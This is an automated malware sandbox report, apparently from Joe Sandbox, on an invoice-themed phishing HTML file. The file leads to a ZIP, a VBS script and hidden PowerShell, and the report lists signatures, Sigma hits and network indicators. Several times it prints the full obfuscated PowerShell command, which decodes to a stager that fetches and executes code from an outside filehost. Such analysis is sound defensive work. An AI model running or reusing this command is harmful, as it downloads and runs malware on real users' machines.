Windows Analysis Report
faktura_FV2025020660849.html

Overview

General Information

Sample name: faktura_FV2025020660849.html
(renamed file extension from htm_ to html)
Original sample name: faktura_FV2025020660849.htm_
Analysis ID: 1637352
MD5: 467b6110a70e52f3bee6a6331cd809bd
SHA1: 9588dfe44777f409bc74eb61f452c8e8b8feae92
SHA256: a4a49cc9e4542c0b845354a26f3ef4bf69065c120101d8179f512bf7507309d6

Detection

Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
AI detected suspicious Javascript
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • chrome.exe (PID: 6068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • unarchiver.exe (PID: 6660 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6720 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6792 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 6860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5660 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • chrome.exe (PID: 6268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020660849.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 6808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 54.39.128.117, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6860, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); 
$((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW
Source: Network Connection | Author: frack113 | Data: DestinationIp: 54.39.128.117, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6860, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" , ProcessId: 6860, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: 
C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 6980, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6808, ProcessName: svchost.exe
No Suricata rule has matched


Phishing

Source: 0.1.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behavior, including the use of the `eval()` function to execute dynamic code. This allows for potential remote code execution, which poses a significant security risk. Additionally, the script appears to be heavily obfuscated, making it difficult to analyze and understand its true purpose. Based on these factors, the script is considered to be high-risk and should be treated with caution.
Source: faktura_FV2025020660849.html | HTTP Parser: Low number of body elements: 0
Source: faktura_FV2025020660849.html | HTTP Parser: No favicon
Source: C:\Windows\SysWOW64\unarchiver.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 54.39.128.117:443 -> 192.168.2.7:49705 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Child: C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exe | Memory has grown: Private usage: 8MB later: 60MB

Networking

Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 54.39.128.117 443
Source: global traffic | TCP traffic: 192.168.2.7:49693 -> 156.229.228.198:13621
Source: global traffic | TCP traffic: 192.168.2.7:50482 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 149.56.240.132
Source: Joe Sandbox View | IP Address: 54.39.128.117
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
  Host: s4.histats.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
  Accept: */*
  Accept-Language: en-ch
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: s4.histats.com
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: s4.histats.com
Source: global traffic | DNS traffic detected: DNS query: filehost200885.info
Source: global traffic | DNS traffic detected: DNS query: _13621._https.filehost200885.info
Source: svchost.exe, 00000011.00000002.2834516229.00000132FF600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000011.00000002.2834795537.00000132FF6D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000011.00000002.2834974179.00000132FF71B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2833920102.00000132FE902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2834795537.00000132FF6F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1473287422.00000132FF4E2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2834795537.00000132FF6D3000.00000004.00000020.00020000.00000000.sdmp, edb.log.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adnnf2xkczyschn5rjlarpymlqwq_2025.3.12.0/
Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000011.00000002.2834630104.00000132FF690000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000011.00000002.2834630104.00000132FF690000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: edb.log.17.dr, qmgr.db.17.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: qmgr.db.17.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000011.00000003.1207118522.00000132FF4E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_opened8%
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_opened=
Source: wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_opened=%
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_openedm
Source: wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: qmgr.db.17.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.%
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/c
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/stas
Source: wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/stat8%
Source: wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/stats
Source: wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2832180699.00000000038B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.000000000340A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/stats/0.php?4935988&
Source: wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histatss$%
Source: unknown | HTTPS traffic detected: 54.39.128.117:443 -> 192.168.2.7:49705 version: TLS 1.2

System Summary

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File dump: C:\Users\user\Downloads\faktura_FV2025020660849.zip (copy)
Source: faktura_FV2025020660849.zip.crdownload.0.dr | Zip Entry: 2025020665304.vbs
Source: chromecache_68.1.dr | Zip Entry: 2025020665304.vbs
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') 